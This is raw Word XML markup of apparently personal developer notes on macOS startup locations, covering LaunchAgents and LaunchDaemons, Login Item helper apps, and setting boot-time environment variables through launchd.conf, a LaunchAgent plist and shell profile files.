    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">/Library/LaunchDaemons </w:t>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sidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Daemon plist files, primarily third party.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">/System/Library/LaunchAgents </w:t>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sidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Agent plist files, primarily those belonging to the system</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">/Library/LaunchAgents </w:t>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sidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ther agent plist fi</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>les, primarily third party. Usually</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>empty.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Library/LaunchAgents </w:t>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Pr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>User-specifi</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>c launch agents, executed for this user only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777FD0" w:rsidRDefault="00777FD0" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00777FD0" w:rsidRDefault="00777FD0" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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ogin Items (in the Users preference pane)</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ibrary/LaunchAgent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ibrary/LaunchDaemon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ibrary/StartupItem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System/Library/LaunchAgent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System/Library/LaunchDaemon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System/Library/StartupItem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ibrary/LaunchAgent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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>- ~/Library/LaunchDaemons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777FD0" w:rsidRPr="00777FD0" w:rsidRDefault="00777FD0" w:rsidP="00777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Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>- ~/Library/StartupItems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777FD0" w:rsidRDefault="00777FD0" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRDefault="00983A50" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc445313221"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Login Item</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00D6693E" w:rsidRDefault="004106D2" w:rsidP="00D6693E">
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00D6693E" w:rsidRPr="00B120E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://blog.timschroeder.net/2012/07/03/the-launch-at-login-sandbox-project/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D6693E" w:rsidRDefault="00D6693E" w:rsidP="00D6693E"/>
    <w:p w:rsidR="00D6693E" w:rsidRDefault="004106D2" w:rsidP="00D6693E">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00D6693E" w:rsidRPr="00B120E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D6693E" w:rsidRPr="00D6693E" w:rsidRDefault="00D6693E" w:rsidP="00D6693E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6693E">
        <w:t>Applications can contain a helper application as a full application bundle, stored inside the main application bundle in the Contents/Library/LoginItems directory. Set either the LSUIElement or LSBackgroundOnly key in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Info.plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:t> file of the helper application’s bundle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="00D6693E" w:rsidRDefault="00983A50" w:rsidP="00983A50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/Applications/LaunchAtLoginApp.app/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Contents/Library/LoginItems</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/LaunchAtLoginApp Helper.app</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Contents/</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Info.plist </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00983A50" w:rsidRPr="00D6693E" w:rsidRDefault="00983A50" w:rsidP="00983A50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/Applications/LaunchAtLoginApp.app/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Contents/Library/LoginItems</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/LaunchAtLoginApp Helper.app</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Contents/</w:t>
      </w:r>
      <w:r w:rsidR="00D6693E" w:rsidRPr="00D6693E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Info.plist </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00233A7D" w:rsidRDefault="00D6693E" w:rsidP="009F6926">
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>LSUIElement</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:t>or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>LSBackgroundOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:t>key in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6693E">
        <w:t>Info.plist </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8"/>
    <w:p w:rsidR="001F74D8" w:rsidRPr="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc445313222"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mac boot config </w:t>
      </w:r>
      <w:r>
        <w:t>environmen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="001F74D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8"/>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="004106D2" w:rsidP="001F74D8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="001F74D8" w:rsidRPr="00EB3583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/603785/environment-variables-in-mac-os-x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="006B4005" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc445313223"/>
      <w:r w:rsidRPr="00886506">
        <w:t>/etc/launchd.conf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="000861FA" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="000861FA" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="000861FA">
        <w:t>echo setenv REPLACE_WITH_VAR REPLACE_WITH_VALUE | launchctl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc445313224"/>
      <w:r w:rsidRPr="00757213">
        <w:lastRenderedPageBreak/>
        <w:t>~/Library/LaunchAgents/local.launchd.conf.plist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </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Fonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&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lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"&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lt;plist version="1.0"&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lt;dict&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key&gt;Label&lt;/key&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string&gt;local.launchd.conf&lt;/string&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key&gt;ProgramArguments&lt;/key&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array&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string&gt;sh&lt;/string&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string&gt;-c&lt;/string&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string&gt;launchctl &lt; ~/.launchd.conf&lt;/string&gt;    </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array&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key&gt;RunAtLoad&lt;/key&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 xml:space="preserve">  &lt;true/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;/plist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="006B4005" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc445313225"/>
      <w:r w:rsidRPr="000861FA">
        <w:t>/etc/profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="006B4005" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc445313226"/>
      <w:r w:rsidRPr="00757213">
        <w:t>~/.profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRPr="006B4005" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc445313227"/>
      <w:r w:rsidRPr="00757213">
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F74D8" w:rsidRDefault="001F74D8" w:rsidP="009F6926"/>
    <w:p w:rsidR="00220FEC" w:rsidRDefault="00FC6E02" w:rsidP="00220FEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
